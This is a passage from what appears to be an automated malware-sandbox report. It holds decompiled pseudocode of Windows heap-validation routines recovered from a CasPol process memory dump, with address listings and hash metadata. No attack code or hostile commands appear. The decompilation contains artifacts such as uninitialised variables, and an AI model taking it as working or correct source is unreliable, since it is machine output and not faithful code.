										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E013BB150();
										} else {
											E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E0140D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E013BB150();
								} else {
									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E0147A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E013DE12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E0147A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E013DE4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E013DA229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E013DA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E013DBC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E014623E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E013B1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                                                        0x01474af7
                                                                        0x01474afb
                                                                        0x01474afd
                                                                        0x01474b01
                                                                        0x01474b03
                                                                        0x01474b08
                                                                        0x01474b0a
                                                                        0x01474b0f
                                                                        0x01474eb5
                                                                        0x01474eb5
                                                                        0x01474ebb
                                                                        0x014750d5
                                                                        0x014750d8
                                                                        0x01474ff6
                                                                        0x00000000
                                                                        0x01474ff6
                                                                        0x014750de
                                                                        0x014750e4
                                                                        0x014750e8
                                                                        0x01475107
                                                                        0x0147510c
                                                                        0x014750ea
                                                                        0x014750ff
                                                                        0x01475104
                                                                        0x01475112
                                                                        0x01475115
                                                                        0x01475118
                                                                        0x01475119
                                                                        0x014750cb
                                                                        0x014750cb
                                                                        0x014750af
                                                                        0x00000000
                                                                        0x014750af
                                                                        0x01474ecb
                                                                        0x014750b6
                                                                        0x014750bb
                                                                        0x01474ed1
                                                                        0x01474ee6
                                                                        0x01474eeb
                                                                        0x014750c1
                                                                        0x014750c2
                                                                        0x014750c5
                                                                        0x014750c6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01474b15
                                                                        0x01474b15
                                                                        0x01474b1c
                                                                        0x01474b1e
                                                                        0x01474b23
                                                                        0x01474b27
                                                                        0x01474b33
                                                                        0x01474b38
                                                                        0x01474b3a
                                                                        0x01474b3c
                                                                        0x01474b41
                                                                        0x01474b41
                                                                        0x01474b3a
                                                                        0x01474b52
                                                                        0x01475045
                                                                        0x0147504b
                                                                        0x0147504f
                                                                        0x0147506e
                                                                        0x01475073
                                                                        0x01475051
                                                                        0x01475066
                                                                        0x0147506b
                                                                        0x01475083
                                                                        0x01475088
                                                                        0x01475088
                                                                        0x0147508a
                                                                        0x01475091
                                                                        0x01475099
                                                                        0x01475099
                                                                        0x0147509d
                                                                        0x014750a7
                                                                        0x014750ad
                                                                        0x014750ad
                                                                        0x014750ad
                                                                        0x00000000
                                                                        0x0147509d
                                                                        0x01474b58
                                                                        0x01474b5b
                                                                        0x01474b5e
                                                                        0x01474b63
                                                                        0x01474b66
                                                                        0x01474b69
                                                                        0x01474b6f
                                                                        0x01474be4
                                                                        0x01474bf0
                                                                        0x01474bf2
                                                                        0x01474bf5
                                                                        0x01474dc3
                                                                        0x01474dc6
                                                                        0x01474dc9
                                                                        0x01474dce
                                                                        0x01474dce
                                                                        0x01474dd0
                                                                        0x01474dd0
                                                                        0x01474dd5
                                                                        0x01474def
                                                                        0x01474dd7
                                                                        0x01474de7
                                                                        0x01474de7
                                                                        0x01474df3
                                                                        0x01475001
                                                                        0x01475007
                                                                        0x0147500b
                                                                        0x0147502a
                                                                        0x0147502f
                                                                        0x0147500d
                                                                        0x01475022
                                                                        0x01475027
                                                                        0x01475039
                                                                        0x0147503a
                                                                        0x0147503b
                                                                        0x00000000
                                                                        0x01474df9
                                                                        0x01474dfd
                                                                        0x01474e90
                                                                        0x01474e94
                                                                        0x01474e9e
                                                                        0x01474ea4
                                                                        0x01474ea4
                                                                        0x01474ea4
                                                                        0x01474ea6
                                                                        0x01474ea6
                                                                        0x00000000
                                                                        0x01474ea6
                                                                        0x01474e03
                                                                        0x01474e08
                                                                        0x01474f88
                                                                        0x01474f92
                                                                        0x01474f99
                                                                        0x01474f9c
                                                                        0x01474fe0
                                                                        0x01474fe4
                                                                        0x01474fee
                                                                        0x01474ff4
                                                                        0x01474ff4
                                                                        0x01474ff4
                                                                        0x00000000
                                                                        0x01474fe4
                                                                        0x01474f9e
                                                                        0x01474fa4
                                                                        0x01474fa8
                                                                        0x01474fc7
                                                                        0x01474fcc
                                                                        0x01474faa
                                                                        0x01474fbf
                                                                        0x01474fc4
                                                                        0x01474fd2
                                                                        0x01474fd5
                                                                        0x01474fd6
                                                                        0x01474f34
                                                                        0x01474f34
                                                                        0x00000000
                                                                        0x01474f39
                                                                        0x01474e0e
                                                                        0x01474e14
                                                                        0x01474e1b
                                                                        0x01474e25
                                                                        0x01474e2b
                                                                        0x01474e2b
                                                                        0x01474e33
                                                                        0x01474e38
                                                                        0x01474e8a
                                                                        0x01474e8a
                                                                        0x00000000
                                                                        0x01474e3a
                                                                        0x01474e3e
                                                                        0x01474e43
                                                                        0x01474e47
                                                                        0x01474e53
                                                                        0x01474e58
                                                                        0x01474e5a
                                                                        0x01474e5c
                                                                        0x01474e61
                                                                        0x01474e61
                                                                        0x01474e5a
                                                                        0x01474e6e
                                                                        0x01474f41
                                                                        0x01474f47
                                                                        0x01474f4b
                                                                        0x01474f6a
                                                                        0x01474f6f
                                                                        0x01474f4d
                                                                        0x01474f62
                                                                        0x01474f67
                                                                        0x01474f7f
                                                                        0x01474f80
                                                                        0x01474f81
                                                                        0x00000000
                                                                        0x01474e74
                                                                        0x01474e78
                                                                        0x01474e82
                                                                        0x01474e88
                                                                        0x01474e88
                                                                        0x00000000
                                                                        0x01474e78
                                                                        0x01474e6e
                                                                        0x01474e38
                                                                        0x01474df3
                                                                        0x01474bfe
                                                                        0x01474c01
                                                                        0x01474c04
                                                                        0x01474c07
                                                                        0x01474c09
                                                                        0x01474c0c
                                                                        0x01474c0e
                                                                        0x01474c0e
                                                                        0x01474c11
                                                                        0x01474c11
                                                                        0x01474c0c
                                                                        0x01474c14
                                                                        0x01474c17
                                                                        0x01474dae
                                                                        0x01474db2
                                                                        0x01474db7
                                                                        0x01474dba
                                                                        0x01474dbd
                                                                        0x01474ef1
                                                                        0x01474ef7
                                                                        0x01474efb
                                                                        0x01474f1a
                                                                        0x01474f1f
                                                                        0x01474efd
                                                                        0x01474f12
                                                                        0x01474f17
                                                                        0x01474f2b
                                                                        0x01474f2b
                                                                        0x01474f2d
                                                                        0x01474f2e
                                                                        0x01474f2f
                                                                        0x00000000
                                                                        0x01474f2f
                                                                        0x00000000
                                                                        0x01474c1d
                                                                        0x01474c1d
                                                                        0x01474c20
                                                                        0x01474c23
                                                                        0x01474c26
                                                                        0x01474c29
                                                                        0x01474c2c
                                                                        0x01474c2e
                                                                        0x01474d91
                                                                        0x01474d91
                                                                        0x01474d92
                                                                        0x01474d97
                                                                        0x01474d9e
                                                                        0x00000000
                                                                        0x01474d9e
                                                                        0x01474c34
                                                                        0x01474c37
                                                                        0x01474c39
                                                                        0x01474c3c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01474c45
                                                                        0x01474c48
                                                                        0x01474c4e
                                                                        0x01474c50
                                                                        0x01474c78
                                                                        0x01474c78
                                                                        0x01474c7b
                                                                        0x01474c7d
                                                                        0x01474c80
                                                                        0x01474c84
                                                                        0x01474cad
                                                                        0x01474cad
                                                                        0x01474cb0
                                                                        0x01474cb8
                                                                        0x01474cbb
                                                                        0x01474cbe
                                                                        0x01474cc1
                                                                        0x01474cc7
                                                                        0x01474cdc
                                                                        0x01474cc9
                                                                        0x01474cd2
                                                                        0x01474cd4
                                                                        0x01474cd4
                                                                        0x01474cde
                                                                        0x01474ce0
                                                                        0x01474d13
                                                                        0x01474d13
                                                                        0x01474d16
                                                                        0x01474d18
                                                                        0x01474d29
                                                                        0x01474d2a
                                                                        0x01474d2c
                                                                        0x01474d34
                                                                        0x01474d1a
                                                                        0x01474d1a
                                                                        0x01474d1a
                                                                        0x01474d1d
                                                                        0x01474d1f
                                                                        0x01474d22
                                                                        0x01474d24
                                                                        0x01474d24
                                                                        0x01474d3c
                                                                        0x01474d3f
                                                                        0x01474d45
                                                                        0x01474d47
                                                                        0x01474d6c
                                                                        0x01474d6c
                                                                        0x01474d70
                                                                        0x01474d7e
                                                                        0x01474d84
                                                                        0x01474d84
                                                                        0x00000000
                                                                        0x01474d49
                                                                        0x01474d49
                                                                        0x01474d56
                                                                        0x01474d56
                                                                        0x01474d59
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01474d4e
                                                                        0x01474d50
                                                                        0x01474d52
                                                                        0x01474d8e
                                                                        0x01474d5d
                                                                        0x01474d5f
                                                                        0x01474d67
                                                                        0x00000000
                                                                        0x01474d67
                                                                        0x01474d54
                                                                        0x01474d54
                                                                        0x01474d5b
                                                                        0x00000000
                                                                        0x01474d5b
                                                                        0x01474ce2
                                                                        0x01474ce2
                                                                        0x01474ce5
                                                                        0x01474ce5
                                                                        0x01474ce7
                                                                        0x01474cfb
                                                                        0x01474ce9
                                                                        0x01474ce9
                                                                        0x01474cec
                                                                        0x01474cef
                                                                        0x01474cf1
                                                                        0x01474cf3
                                                                        0x01474cf3
                                                                        0x01474cf3
                                                                        0x01474cf6
                                                                        0x01474cf6
                                                                        0x01474d02
                                                                        0x01474d05
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01474d07
                                                                        0x01474d0f
                                                                        0x01474d11
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01474d11
                                                                        0x00000000
                                                                        0x01474ce5
                                                                        0x01474ce0
                                                                        0x01474c8a
                                                                        0x01474c8f
                                                                        0x01474c91
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01474c9d
                                                                        0x00000000
                                                                        0x01474c9d
                                                                        0x01474c52
                                                                        0x01474c5f
                                                                        0x01474c5f
                                                                        0x01474c62
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01474c57
                                                                        0x01474c59
                                                                        0x01474c5b
                                                                        0x01474caa
                                                                        0x01474c66
                                                                        0x01474c68
                                                                        0x01474c70
                                                                        0x01474c75
                                                                        0x00000000
                                                                        0x01474c75
                                                                        0x01474c5d
                                                                        0x01474c5d
                                                                        0x01474c64
                                                                        0x00000000
                                                                        0x01474c64
                                                                        0x01474c17
                                                                        0x01474b75
                                                                        0x01474bc4
                                                                        0x01474bc8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01474bd9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01474b77
                                                                        0x01474b7a
                                                                        0x01474b8c
                                                                        0x01474b7c
                                                                        0x01474b7e
                                                                        0x01474b83
                                                                        0x01474b86
                                                                        0x01474b86
                                                                        0x01474b90
                                                                        0x01474b93
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01474b95
                                                                        0x01474bab
                                                                        0x01474bb0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01474bb2
                                                                        0x01474bb9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01474bbb
                                                                        0x01474bbe
                                                                        0x01474bc1
                                                                        0x01474bc1
                                                                        0x00000000
                                                                        0x01474bc1
                                                                        0x01474b97
                                                                        0x01474ba4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01474ba6
                                                                        0x00000000
                                                                        0x01474ba6
                                                                        0x01474ea9
                                                                        0x01474ea9
                                                                        0x01474eb2
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                        • API String ID: 0-3591852110
                                                                        • Opcode ID: 193612466a11511d7bb24c9291de3c2487ee650e16ef4260235928ef534bd244
                                                                        • Instruction ID: f1dd96b82db896329b61e292c9a7c2b1d028bc0de8f6dda4769c1fa4f4200a04
                                                                        • Opcode Fuzzy Hash: 193612466a11511d7bb24c9291de3c2487ee650e16ef4260235928ef534bd244
                                                                        • Instruction Fuzzy Hash: E312CE702006429FEB25CF69C495BFBBBF5EF08314F18845AE5868B7A1D774E881CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01474496 Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 56%
                                                                        			E01474496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E014749A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x14a6378 = _t267;
						asm("int3");
						 *0x14a6378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E013E174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E013BB150();
							} else {
								E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E013BB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E013BB150();
							} else {
								E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E013BB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x14a6350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E013F9660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E013E174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E013BB150();
										} else {
											E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E013BB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E013BB150();
									} else {
										E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E013BB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E013BB150();
								} else {
									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E013BB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E013BB150();
							} else {
								E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E01474AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E0146FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E014623E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
